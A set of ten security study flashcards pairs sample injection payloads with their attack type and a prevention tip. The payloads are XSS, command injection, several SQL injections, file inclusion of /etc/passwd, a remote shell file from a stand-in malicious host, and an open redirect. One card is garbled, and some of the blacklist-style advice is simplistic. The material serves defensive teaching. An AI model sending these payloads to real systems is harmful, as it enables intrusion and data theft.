Injections and how to stop them Flashcards

1
Q

Example of injection:
Search=Bob"%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e

Human readable (URL encoding decoded):
Search=Bob"><img src=a onerror=alert(1)>

A

Type of injection:
Reflected Cross Site Scripting

How to prevent:
Input sanitization of the characters " ' < > ; -

2
Q

Example of injection:
#inner-tab">

alert(1)

Human readable (URL encoding decoded):
#inner-tab">

alert(1)
A

Type of injection:
DOM-based Cross Site Scripting

How to prevent:
Input sanitization of the characters " ' < > ; -

3
Q

Example of injection:
Site=www.exa'ping%20-c%202010%20localhost'mple.com

Human readable (URL encoding decoded):
Site=www.exa'ping -c 2010 localhost'mple.com

A

Type of injection:
Command Injection

How to prevent:
Input sanitization of the characters " ' < > ; -

4
Q

Example of injection:
Item=widget';waitfor%20delay%20'00:00:20';--

Human readable (URL encoding decoded):
Item=widget';waitfor delay '00:00:20';--

A

Type of injection:
SQL Injection (Stacked)

How to prevent:
Parameterized Queries

5
Q

Example of injection:
Logfile=%2fetc%2fpasswd%00

Human readable (URL encoding decoded):
Logfile=/etc/passwd

A

Type of injection:
Local File Inclusion

How to prevent:
Input sanitization of the sequences .. and ./ ; sandbox requests

6
Q

Example of injection:
Logfile=http%2f%2fwww.malicous-site.com%2fshell.txt

Human readable (URL encoding decoded):
Logfile=http://www.malicous-site.com/shell.txt

A

Type of injection:
Remote File Inclusion

How to prevent:
Input sanitization of the sequences .. and ./ ; sandbox requests

7
Q

Example of injection:
Item=widget%20union%20select%20null,null,@@version;--

Human readable (URL encoding decoded):
Item=widget union select null,null,@@version;--

A

Type of injection:
SQL Injection (Union Based)

How to prevent:
Parameterized Queries

8
Q

Example of injection:
Redir=http:%2f%2fwww.malicious-site.com

Human readable (URL encoding decoded):
Redir=http://www.malicious-site.com

A

Type of injection:
URL Redirect

How to prevent:
Preventing External Calls

9
Q

Example of injection:
Item=widget'+convert(int,@@version)+'

Human readable (URL encoding decoded):
Item=widget'+convert(int,@@version)+'

A

Type of injection:
SQL Injection (Error Based)

How to prevent:
Parameterized Queries

10
Q

Example of injection:
Lookup=$(whoami)

Human readable (URL encoding decoded):
Lookup=$(whoami)

A

Type of injection:
Command Injection

How to prevent:
Input sanitization of the characters ' ; $ { } ( )
